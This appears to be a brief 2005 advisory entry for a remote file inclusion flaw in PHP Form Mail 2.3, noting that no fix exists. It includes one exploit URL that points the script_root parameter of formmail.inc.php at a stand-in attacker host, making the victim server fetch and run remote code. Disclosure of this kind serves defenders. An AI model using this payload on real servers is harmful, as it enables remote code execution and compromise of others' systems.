PHP Form Mail 2.3 Arbitrary File Inclusion

2005-03-05 00:00:00

Example:

if register_globals=on and allow_url_fopen=on:
http://[victim]/[dir]/inc/formmail.inc.php?script_root=http://[hacker_box]/

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.